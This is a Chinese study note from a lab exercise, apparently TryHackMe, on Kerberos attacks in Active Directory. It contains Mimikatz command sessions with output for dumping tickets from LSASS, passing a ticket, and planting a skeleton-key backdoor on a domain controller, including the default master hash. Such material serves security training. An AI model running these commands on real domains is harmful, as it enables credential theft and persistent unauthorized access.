:::info

  • Kerbrute 枚举: 不需要域的访问权限
  • PTT : 需要以用户身份访问域
  • Kerberosating : 需要以任何用户身份访问
  • AS-REP Roasting : 需要以任何`用户身份访问
  • 金票: 需要域管理
  • 银票: 需要服务哈希
  • Skeleton Key : 需要域管理

:::

枚举

Kerbrute

Rubeus

Rubeus

Kerberoasting

Kerberoasting

AS-REP Roasting

AS-REP Roasting

Mimikatz 票证

我们可以利用 Mimikatz 从 LSASS 内存中转储 TGT

:::color1 当我们使用 Mimikatz 从 LSASS 中转储 Kerberos 票证时,会给我们返回 .kirbi票证

:::

Kerberos 攻击 - 图1

  1. controller\administrator@CONTROLLER-1 C:\Users\Administrator\Downloads>mimikatz.exe
  2. .#####. mimikatz 2.2.0 (x64) #19041 May 19 2020 00:48:59
  3. .## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
  4. ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
  5. ## \ / ## > http://blog.gentilkiwi.com/mimikatz
  6. '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
  7. '#####' > http://pingcastle.com / http://mysmartlogon.com ***/
  8. mimikatz # privilege::debug
  9. Privilege '20' OK
  10. mimikatz # sekurlsa::tickets /export # 输出凭证

上述命令执行后,我们可以在文件夹中发现 .kirbi文件

  1. controller\administrator@CONTROLLER-1 C:\Users\Administrator\Downloads>dir
  2. Volume in drive C has no label.
  3. Volume Serial Number is E203-08FF
  4. Directory of C:\Users\Administrator\Downloads
  5. 03/15/2023 11:49 PM <DIR> .
  6. 03/15/2023 11:49 PM <DIR> ..
  7. 05/25/2020 03:45 PM 1,263,880 mimikatz.exe
  8. 05/25/2020 03:14 PM 212,480 Rubeus.exe
  9. 03/15/2023 11:49 PM 1,755 [0;35009]-1-0-40a50000-CONTROLLER-1$@ldap-CONTROLLER-1.CONTROLLER.local.kirbi
  10. 03/15/2023 11:49 PM 1,587 [0;35474]-2-0-60a10000-CONTROLLER-1$@krbtgt-CONTROLLER.LOCAL.kirbi
  11. 03/15/2023 11:49 PM 1,595 [0;37a95]-2-0-40e10000-Administrator@krbtgt-CONTROLLER.LOCAL.kirbi
  12. 03/15/2023 11:49 PM 1,755 [0;3d9aa]-1-0-40a50000-CONTROLLER-1$@ldap-CONTROLLER-1.CONTROLLER.local.kirbi
  13. 03/15/2023 11:49 PM 1,755 [0;3da5f]-1-0-40a50000-CONTROLLER-1$@ldap-CONTROLLER-1.CONTROLLER.local.kirbi
  14. 03/15/2023 11:49 PM 1,711 [0;3e7]-0-0-40a50000.kirbi
  15. 03/15/2023 11:49 PM 1,791 [0;3e7]-0-1-40a50000-CONTROLLER-1$@cifs-CONTROLLER-1.CONTROLLER.local.kirbi
  16. 03/15/2023 11:49 PM 1,791 [0;3e7]-0-2-40a50000-CONTROLLER-1$@LDAP-CONTROLLER-1.CONTROLLER.local.kirbi
  17. 03/15/2023 11:49 PM 1,721 [0;3e7]-0-3-40a50000-CONTROLLER-1$@LDAP-CONTROLLER-1.kirbi
  18. 03/15/2023 11:49 PM 1,755 [0;3e7]-0-4-40a50000-CONTROLLER-1$@ldap-CONTROLLER-1.CONTROLLER.local.kirbi
  19. 03/15/2023 11:49 PM 1,647 [0;3e7]-1-0-00a50000.kirbi
  20. 03/15/2023 11:49 PM 1,587 [0;3e7]-2-0-60a10000-CONTROLLER-1$@krbtgt-CONTROLLER.LOCAL.kirbi
  21. 03/15/2023 11:49 PM 1,587 [0;3e7]-2-1-40e10000-CONTROLLER-1$@krbtgt-CONTROLLER.LOCAL.kirbi
  22. 15 File(s) 1,498,397 bytes
  23. 2 Dir(s) 50,932,228,096 bytes free

导入凭证

  1. controller\administrator@CONTROLLER-1 C:\Users\Administrator\Downloads>mimikatz.exe
  2. .#####. mimikatz 2.2.0 (x64) #19041 May 19 2020 00:48:59
  3. .## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
  4. ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
  5. ## \ / ## > http://blog.gentilkiwi.com/mimikatz
  6. '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
  7. '#####' > http://pingcastle.com / http://mysmartlogon.com ***/
  8. mimikatz # kerberos::ptt [0;3e7]-0-1-40a50000-CONTROLLER-1$@cifs-CONTROLLER-1.CONTROLLER.local.kirbi
  9. * File: '[0;3e7]-0-1-40a50000-CONTROLLER-1$@cifs-CONTROLLER-1.CONTROLLER.local.kirbi': OK

导入后我们可以使用 klist进行验证

金票/银票攻击

金银票

Kerberos Backdoors w/ mimikatz

:::color1 Kerberos Backdoors 将自身植入域的内存中,允许使用自己的主密码访问任何计算机

Kerberos Backdoors 通过植入一个框架密钥来运行,该密钥通过利用 AS-REQ 验证加密时间戳的方式

mimikatz skeleton key 的默认哈希值为 60BA4FCADC466C7A033C178194C03DF6,它使密码 -“mimikatz”

:::

mimikatz skeleton key

skeleton key 的工作原理是滥用 AS-REQ 加密时间戳,如上所述,时间戳是使用用户 NT 哈希加密的。然后,域控制器尝试使用用户 NT 哈希解密此时间戳,一旦植入了主干密钥,域控制器就会尝试使用用户 NT 哈希和允许您访问域林的框架密钥 NT 哈希解密时间戳

  1. controller\administrator@CONTROLLER-1 C:\Users\Administrator\Downloads>mimikatz.exe
  2. .#####. mimikatz 2.2.0 (x64) #19041 May 19 2020 00:48:59
  3. .## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
  4. ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
  5. ## \ / ## > http://blog.gentilkiwi.com/mimikatz
  6. '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
  7. '#####' > http://pingcastle.com / http://mysmartlogon.com ***/
  8. mimikatz # privilege::debug
  9. Privilege '20' OK
  10. mimikatz # misc::skeleton # 注入 skeleton key
  11. [KDC] data
  12. [KDC] struct
  13. [KDC] keys patch OK
  14. [RC4] functions
  15. [RC4] init patch OK
  16. [RC4] decrypt patch OK

具体利用还不知道怎么使用,可以尝试看下面这篇文章

mimikatz

参考

TryHackMe | Cyber Security Training